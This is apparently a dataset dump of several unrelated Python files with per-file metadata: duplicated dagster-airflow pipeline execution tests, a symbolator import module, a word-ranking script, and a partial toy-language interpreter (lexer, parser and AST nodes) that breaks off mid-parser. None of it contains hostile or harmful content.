class TestExecuteDagContainerizedFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagKubernetizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
class TestExecuteDagKubernetizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
def test_rename_for_airflow():
pairs = [
('foo', 'foo'),
('this-is-valid', 'this-is-valid'),
(
'a' * AIRFLOW_MAX_DAG_NAME_LEN + 'very long strings are disallowed',
'a' * AIRFLOW_MAX_DAG_NAME_LEN,
),
('a name with illegal spaces', 'a_name_with_illegal_spaces'),
('a#name$with@special*chars!!!', 'a_name_with_special_chars___'),
]
for before, after in pairs:
assert after == _rename_for_airflow(before)
def validate_skip_pipeline_execution(result):
expected_airflow_task_states = {
('foo', False),
('first_consumer', False),
('second_consumer', True),
('third_consumer', True),
}
seen = {(ti.task_id, isinstance(value, AirflowSkipException)) for ti, value in result.items()}
assert seen == expected_airflow_task_states
class TestExecuteSkipsPythonOperator(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteSkipsContainerized(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_docker_operator_pipeline)
| 36.976923
| 98
| 0.741939
|
from __future__ import unicode_literals
import os
import uuid
from airflow.exceptions import AirflowSkipException
from dagster_airflow.factory import AIRFLOW_MAX_DAG_NAME_LEN, _rename_for_airflow
from dagster_airflow.test_fixtures import (
dagster_airflow_docker_operator_pipeline,
dagster_airflow_k8s_operator_pipeline,
dagster_airflow_python_operator_pipeline,
)
from dagster_airflow_tests.conftest import IMAGE
from dagster_airflow_tests.marks import nettest
from dagster import ExecutionTargetHandle
from dagster.core.events.log import DagsterEventRecord
from dagster.utils import script_relative_path
AIRFLOW_DEMO_EVENTS = {
('ENGINE_EVENT', None),
('STEP_START', 'multiply_the_word.compute'),
('STEP_INPUT', 'multiply_the_word.compute'),
('STEP_OUTPUT', 'multiply_the_word.compute'),
('OBJECT_STORE_OPERATION', 'multiply_the_word.compute'),
('STEP_SUCCESS', 'multiply_the_word.compute'),
('STEP_START', 'count_letters.compute'),
('OBJECT_STORE_OPERATION', 'count_letters.compute'),
('STEP_INPUT', 'count_letters.compute'),
('STEP_OUTPUT', 'count_letters.compute'),
('STEP_SUCCESS', 'count_letters.compute'),
}
ENVIRONMENTS_PATH = script_relative_path(
os.path.join(
'..',
'..',
'..',
'.buildkite',
'images',
'docker',
'test_project',
'test_pipelines',
'environments',
)
)
def validate_pipeline_execution(pipeline_exc_result):
seen_events = set()
for result in pipeline_exc_result.values():
for event in result:
if isinstance(event, DagsterEventRecord):
seen_events.add((event.dagster_event.event_type_value, event.step_key))
else:
seen_events.add((event.event_type_value, event.step_key))
assert seen_events == AIRFLOW_DEMO_EVENTS
class TestExecuteDagPythonFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
class TestExecuteDagKubernetizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
class TestExecuteDagKubernetizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
def test_rename_for_airflow():
pairs = [
('foo', 'foo'),
('this-is-valid', 'this-is-valid'),
(
'a' * AIRFLOW_MAX_DAG_NAME_LEN + 'very long strings are disallowed',
'a' * AIRFLOW_MAX_DAG_NAME_LEN,
),
('a name with illegal spaces', 'a_name_with_illegal_spaces'),
('a#name$with@special*chars!!!', 'a_name_with_special_chars___'),
]
for before, after in pairs:
assert after == _rename_for_airflow(before)
def validate_skip_pipeline_execution(result):
expected_airflow_task_states = {
('foo', False),
('first_consumer', False),
('second_consumer', True),
('third_consumer', True),
}
seen = {(ti.task_id, isinstance(value, AirflowSkipException)) for ti, value in result.items()}
assert seen == expected_airflow_task_states
class TestExecuteSkipsPythonOperator(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteSkipsContainerized(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_docker_operator_pipeline)
| true
| true
|
f70b7c4882be3566aec8efefe1b2fcf666fad2ae
| 83
|
py
|
Python
|
symbolator/corpus/__init__.py
|
buildsi/symbolator
|
4af830082d994d5a6d899189ac8e6dd236332ac9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-11-09T09:14:27.000Z
|
2021-11-09T17:16:56.000Z
|
symbolator/corpus/__init__.py
|
buildsi/symbolator
|
4af830082d994d5a6d899189ac8e6dd236332ac9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-06-19T17:19:12.000Z
|
2021-10-31T19:51:50.000Z
|
symbolator/corpus/__init__.py
|
buildsi/symbolator
|
4af830082d994d5a6d899189ac8e6dd236332ac9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
from .elf import Corpus
from .base import CorpusBase, JsonCorpus, JsonCorpusLoader
| 27.666667
| 58
| 0.831325
|
from .elf import Corpus
from .base import CorpusBase, JsonCorpus, JsonCorpusLoader
| true
| true
|
f70b7d0d3c8ecc6b25400f485bf3ddd85c3790e5
| 759
|
py
|
Python
|
Demos/Distancias_ocurrencias.py
|
TheReverseWasp/TBD_TF-IDF_with_Google_Corpus
|
92e60148f625cf0be0300b60e3e09b553f96b7df
|
[
"MIT"
] | null | null | null |
Demos/Distancias_ocurrencias.py
|
TheReverseWasp/TBD_TF-IDF_with_Google_Corpus
|
92e60148f625cf0be0300b60e3e09b553f96b7df
|
[
"MIT"
] | null | null | null |
Demos/Distancias_ocurrencias.py
|
TheReverseWasp/TBD_TF-IDF_with_Google_Corpus
|
92e60148f625cf0be0300b60e3e09b553f96b7df
|
[
"MIT"
] | null | null | null |
import json
import re
import spacy
import enchant
import copy as cp
sp = spacy.load('en_core_web_sm')
def lemmatize_this(str_word):
    return sp(str_word)[0].lemma_
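# lemmatization collapses inflected forms onto a single key (e.g. "words" -> "word"),
# so the lookup below matches the per-word JSON files under ../Datos/06_words_fixed/stg0/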
def main():
while True:
print("Ingrese la Palabra: ")
word = input()
word = str(lemmatize_this(word))
try:
with open("../Datos/06_words_fixed/stg0/" + word + ".json", "r") as answerJson:
wordDic = json.load(answerJson)
elems = [[k, v] for k, v in wordDic.items()]
elems.sort(key = lambda x: x[1])
rank = len(elems)
for i in elems:
print(rank, i)
                    rank -= 1
        except FileNotFoundError:
            print("Palabra no encontrada")
if __name__ == "__main__":
main()
| 24.483871
| 91
| 0.541502
|
import json
import re
import spacy
import enchant
import copy as cp
sp = spacy.load('en_core_web_sm')
def lemmatize_this(str_word):
    return sp(str_word)[0].lemma_
def main():
while True:
print("Ingrese la Palabra: ")
word = input()
word = str(lemmatize_this(word))
try:
with open("../Datos/06_words_fixed/stg0/" + word + ".json", "r") as answerJson:
wordDic = json.load(answerJson)
elems = [[k, v] for k, v in wordDic.items()]
elems.sort(key = lambda x: x[1])
rank = len(elems)
for i in elems:
print(rank, i)
                    rank -= 1
        except FileNotFoundError:
            print("Palabra no encontrada")
if __name__ == "__main__":
main()
| true
| true
|
f70b7fd4259e0ee06d7ecf1c652c7a551b8fef2a
| 37,041
|
py
|
Python
|
ep8/basic.py
|
Eli-pixel/py-myopl-code
|
babfbdec2b9bcb057ccc38424d81efaaf8b719b6
|
[
"MIT"
] | 325
|
2019-05-16T17:48:57.000Z
|
2022-03-31T05:57:49.000Z
|
ep8/basic.py
|
Eli-pixel/py-myopl-code
|
babfbdec2b9bcb057ccc38424d81efaaf8b719b6
|
[
"MIT"
] | 18
|
2020-03-11T22:03:12.000Z
|
2022-03-07T20:23:09.000Z
|
ep8/basic.py
|
Eli-pixel/py-myopl-code
|
babfbdec2b9bcb057ccc38424d81efaaf8b719b6
|
[
"MIT"
] | 359
|
2019-05-16T17:49:06.000Z
|
2022-03-31T09:57:46.000Z
|
#######################################
# IMPORTS
#######################################
from strings_with_arrows import *
import string
#######################################
# CONSTANTS
#######################################
DIGITS = '0123456789'
LETTERS = string.ascii_letters
LETTERS_DIGITS = LETTERS + DIGITS
#######################################
# ERRORS
#######################################
class Error:
def __init__(self, pos_start, pos_end, error_name, details):
self.pos_start = pos_start
self.pos_end = pos_end
self.error_name = error_name
self.details = details
def as_string(self):
result = f'{self.error_name}: {self.details}\n'
result += f'File {self.pos_start.fn}, line {self.pos_start.ln + 1}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
class IllegalCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Illegal Character', details)
class ExpectedCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Expected Character', details)
class InvalidSyntaxError(Error):
def __init__(self, pos_start, pos_end, details=''):
super().__init__(pos_start, pos_end, 'Invalid Syntax', details)
class RTError(Error):
def __init__(self, pos_start, pos_end, details, context):
super().__init__(pos_start, pos_end, 'Runtime Error', details)
self.context = context
def as_string(self):
result = self.generate_traceback()
result += f'{self.error_name}: {self.details}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
def generate_traceback(self):
result = ''
pos = self.pos_start
ctx = self.context
while ctx:
result = f' File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n' + result
pos = ctx.parent_entry_pos
ctx = ctx.parent
return 'Traceback (most recent call last):\n' + result
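    # generate_traceback() walks the Context.parent chain, producing a
    # Python-style "Traceback (most recent call last)" for nested calls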
#######################################
# POSITION
#######################################
class Position:
def __init__(self, idx, ln, col, fn, ftxt):
self.idx = idx
self.ln = ln
self.col = col
self.fn = fn
self.ftxt = ftxt
def advance(self, current_char=None):
self.idx += 1
self.col += 1
if current_char == '\n':
self.ln += 1
self.col = 0
return self
def copy(self):
return Position(self.idx, self.ln, self.col, self.fn, self.ftxt)
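    # copy() matters: tokens and errors keep pos_start/pos_end snapshots, and
    # without copies every stored position would keep advancing with the lexer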
#######################################
# TOKENS
#######################################
TT_INT = 'INT'
TT_FLOAT = 'FLOAT'
TT_IDENTIFIER = 'IDENTIFIER'
TT_KEYWORD = 'KEYWORD'
TT_PLUS = 'PLUS'
TT_MINUS = 'MINUS'
TT_MUL = 'MUL'
TT_DIV = 'DIV'
TT_POW = 'POW'
TT_EQ = 'EQ'
TT_LPAREN = 'LPAREN'
TT_RPAREN = 'RPAREN'
TT_EE = 'EE'
TT_NE = 'NE'
TT_LT = 'LT'
TT_GT = 'GT'
TT_LTE = 'LTE'
TT_GTE = 'GTE'
TT_COMMA = 'COMMA'
TT_ARROW = 'ARROW'
TT_EOF = 'EOF'
KEYWORDS = [
'VAR',
'AND',
'OR',
'NOT',
'IF',
'ELIF',
'ELSE',
'FOR',
'TO',
'STEP',
'WHILE',
'FUN',
'THEN'
]
class Token:
def __init__(self, type_, value=None, pos_start=None, pos_end=None):
self.type = type_
self.value = value
if pos_start:
self.pos_start = pos_start.copy()
self.pos_end = pos_start.copy()
self.pos_end.advance()
if pos_end:
self.pos_end = pos_end.copy()
def matches(self, type_, value):
return self.type == type_ and self.value == value
def __repr__(self):
if self.value: return f'{self.type}:{self.value}'
return f'{self.type}'
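    # e.g. Token(TT_INT, 123) prints as INT:123; a valueless Token(TT_PLUS)
    # prints as just PLUS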
#######################################
# LEXER
#######################################
class Lexer:
def __init__(self, fn, text):
self.fn = fn
self.text = text
self.pos = Position(-1, 0, -1, fn, text)
self.current_char = None
self.advance()
def advance(self):
self.pos.advance(self.current_char)
self.current_char = self.text[self.pos.idx] if self.pos.idx < len(self.text) else None
def make_tokens(self):
tokens = []
while self.current_char != None:
if self.current_char in ' \t':
self.advance()
elif self.current_char in DIGITS:
tokens.append(self.make_number())
elif self.current_char in LETTERS:
tokens.append(self.make_identifier())
elif self.current_char == '+':
tokens.append(Token(TT_PLUS, pos_start=self.pos))
self.advance()
elif self.current_char == '-':
tokens.append(self.make_minus_or_arrow())
elif self.current_char == '*':
tokens.append(Token(TT_MUL, pos_start=self.pos))
self.advance()
elif self.current_char == '/':
tokens.append(Token(TT_DIV, pos_start=self.pos))
self.advance()
elif self.current_char == '^':
tokens.append(Token(TT_POW, pos_start=self.pos))
self.advance()
elif self.current_char == '(':
tokens.append(Token(TT_LPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == ')':
tokens.append(Token(TT_RPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == '!':
token, error = self.make_not_equals()
if error: return [], error
tokens.append(token)
elif self.current_char == '=':
tokens.append(self.make_equals())
elif self.current_char == '<':
tokens.append(self.make_less_than())
elif self.current_char == '>':
tokens.append(self.make_greater_than())
elif self.current_char == ',':
tokens.append(Token(TT_COMMA, pos_start=self.pos))
self.advance()
else:
pos_start = self.pos.copy()
char = self.current_char
self.advance()
return [], IllegalCharError(pos_start, self.pos, "'" + char + "'")
tokens.append(Token(TT_EOF, pos_start=self.pos))
return tokens, None
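    # e.g. make_tokens() on "VAR x = 1 + 2" yields
    # [KEYWORD:VAR, IDENTIFIER:x, EQ, INT:1, PLUS, INT:2, EOF]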
def make_number(self):
num_str = ''
dot_count = 0
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in DIGITS + '.':
if self.current_char == '.':
if dot_count == 1: break
dot_count += 1
num_str += self.current_char
self.advance()
if dot_count == 0:
return Token(TT_INT, int(num_str), pos_start, self.pos)
else:
return Token(TT_FLOAT, float(num_str), pos_start, self.pos)
def make_identifier(self):
id_str = ''
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in LETTERS_DIGITS + '_':
id_str += self.current_char
self.advance()
tok_type = TT_KEYWORD if id_str in KEYWORDS else TT_IDENTIFIER
return Token(tok_type, id_str, pos_start, self.pos)
def make_minus_or_arrow(self):
tok_type = TT_MINUS
pos_start = self.pos.copy()
self.advance()
if self.current_char == '>':
self.advance()
tok_type = TT_ARROW
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
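    # '-' alone is MINUS; '->' becomes ARROW, used by FUN definitions such as
    # FUN add(a, b) -> a + b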
def make_not_equals(self):
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
return Token(TT_NE, pos_start=pos_start, pos_end=self.pos), None
self.advance()
return None, ExpectedCharError(pos_start, self.pos, "'=' (after '!')")
def make_equals(self):
tok_type = TT_EQ
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_EE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_less_than(self):
tok_type = TT_LT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_LTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_greater_than(self):
tok_type = TT_GT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_GTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
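    # make_equals/make_less_than/make_greater_than share one shape: emit the
    # single-character token (EQ/LT/GT) unless the next char is '=', which
    # upgrades it to EE/LTE/GTE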
#######################################
# NODES
#######################################
class NumberNode:
def __init__(self, tok):
self.tok = tok
self.pos_start = self.tok.pos_start
self.pos_end = self.tok.pos_end
def __repr__(self):
return f'{self.tok}'
class VarAccessNode:
def __init__(self, var_name_tok):
self.var_name_tok = var_name_tok
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.var_name_tok.pos_end
class VarAssignNode:
def __init__(self, var_name_tok, value_node):
self.var_name_tok = var_name_tok
self.value_node = value_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.value_node.pos_end
class BinOpNode:
def __init__(self, left_node, op_tok, right_node):
self.left_node = left_node
self.op_tok = op_tok
self.right_node = right_node
self.pos_start = self.left_node.pos_start
self.pos_end = self.right_node.pos_end
def __repr__(self):
return f'({self.left_node}, {self.op_tok}, {self.right_node})'
class UnaryOpNode:
def __init__(self, op_tok, node):
self.op_tok = op_tok
self.node = node
self.pos_start = self.op_tok.pos_start
self.pos_end = node.pos_end
def __repr__(self):
return f'({self.op_tok}, {self.node})'
class IfNode:
def __init__(self, cases, else_case):
self.cases = cases
self.else_case = else_case
self.pos_start = self.cases[0][0].pos_start
self.pos_end = (self.else_case or self.cases[len(self.cases) - 1][0]).pos_end
class ForNode:
def __init__(self, var_name_tok, start_value_node, end_value_node, step_value_node, body_node):
self.var_name_tok = var_name_tok
self.start_value_node = start_value_node
self.end_value_node = end_value_node
self.step_value_node = step_value_node
self.body_node = body_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.body_node.pos_end
class WhileNode:
def __init__(self, condition_node, body_node):
self.condition_node = condition_node
self.body_node = body_node
self.pos_start = self.condition_node.pos_start
self.pos_end = self.body_node.pos_end
class FuncDefNode:
def __init__(self, var_name_tok, arg_name_toks, body_node):
self.var_name_tok = var_name_tok
self.arg_name_toks = arg_name_toks
self.body_node = body_node
if self.var_name_tok:
self.pos_start = self.var_name_tok.pos_start
elif len(self.arg_name_toks) > 0:
self.pos_start = self.arg_name_toks[0].pos_start
else:
self.pos_start = self.body_node.pos_start
self.pos_end = self.body_node.pos_end
class CallNode:
def __init__(self, node_to_call, arg_nodes):
self.node_to_call = node_to_call
self.arg_nodes = arg_nodes
self.pos_start = self.node_to_call.pos_start
if len(self.arg_nodes) > 0:
self.pos_end = self.arg_nodes[len(self.arg_nodes) - 1].pos_end
else:
self.pos_end = self.node_to_call.pos_end
#######################################
# PARSE RESULT
#######################################
class ParseResult:
def __init__(self):
self.error = None
self.node = None
self.last_registered_advance_count = 0
self.advance_count = 0
def register_advancement(self):
self.last_registered_advance_count = 1
self.advance_count += 1
def register(self, res):
self.last_registered_advance_count = res.advance_count
self.advance_count += res.advance_count
if res.error: self.error = res.error
return res.node
def success(self, node):
self.node = node
return self
def failure(self, error):
if not self.error or self.last_registered_advance_count == 0:
self.error = error
return self
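    # failure() overwrites a held error only when the last register()ed result
    # consumed no tokens, so error messages from parse paths that actually made
    # progress are preserved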
#######################################
# PARSER
#######################################
class Parser:
def __init__(self, tokens):
self.tokens = tokens
self.tok_idx = -1
self.advance()
    def advance(self):
self.tok_idx += 1
if self.tok_idx < len(self.tokens):
self.current_tok = self.tokens[self.tok_idx]
return self.current_tok
def parse(self):
res = self.expr()
if not res.error and self.current_tok.type != TT_EOF:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '+', '-', '*', '/', '^', '==', '!=', '<', '>', <=', '>=', 'AND' or 'OR'"
))
return res
###################################
def expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'VAR'):
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '='"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
return res.success(VarAssignNode(var_name, expr))
node = res.register(self.bin_op(self.comp_expr, ((TT_KEYWORD, 'AND'), (TT_KEYWORD, 'OR'))))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def comp_expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'NOT'):
op_tok = self.current_tok
res.register_advancement()
self.advance()
node = res.register(self.comp_expr())
if res.error: return res
return res.success(UnaryOpNode(op_tok, node))
node = res.register(self.bin_op(self.arith_expr, (TT_EE, TT_NE, TT_LT, TT_GT, TT_LTE, TT_GTE)))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def arith_expr(self):
return self.bin_op(self.term, (TT_PLUS, TT_MINUS))
def term(self):
return self.bin_op(self.factor, (TT_MUL, TT_DIV))
def factor(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_PLUS, TT_MINUS):
res.register_advancement()
self.advance()
factor = res.register(self.factor())
if res.error: return res
return res.success(UnaryOpNode(tok, factor))
return self.power()
def power(self):
return self.bin_op(self.call, (TT_POW, ), self.factor)
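    # parsing the right operand with self.factor (not self.call) makes '^'
    # right-associative: 2 ^ 3 ^ 2 parses as 2 ^ (3 ^ 2)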
def call(self):
res = ParseResult()
atom = res.register(self.atom())
if res.error: return res
if self.current_tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
arg_nodes = []
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
else:
arg_nodes.append(res.register(self.expr()))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')', 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
arg_nodes.append(res.register(self.expr()))
if res.error: return res
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
res.register_advancement()
self.advance()
return res.success(CallNode(atom, arg_nodes))
return res.success(atom)
def atom(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_INT, TT_FLOAT):
res.register_advancement()
self.advance()
return res.success(NumberNode(tok))
elif tok.type == TT_IDENTIFIER:
res.register_advancement()
self.advance()
return res.success(VarAccessNode(tok))
elif tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
return res.success(expr)
else:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')'"
))
elif tok.matches(TT_KEYWORD, 'IF'):
if_expr = res.register(self.if_expr())
if res.error: return res
return res.success(if_expr)
elif tok.matches(TT_KEYWORD, 'FOR'):
for_expr = res.register(self.for_expr())
if res.error: return res
return res.success(for_expr)
elif tok.matches(TT_KEYWORD, 'WHILE'):
while_expr = res.register(self.while_expr())
if res.error: return res
return res.success(while_expr)
elif tok.matches(TT_KEYWORD, 'FUN'):
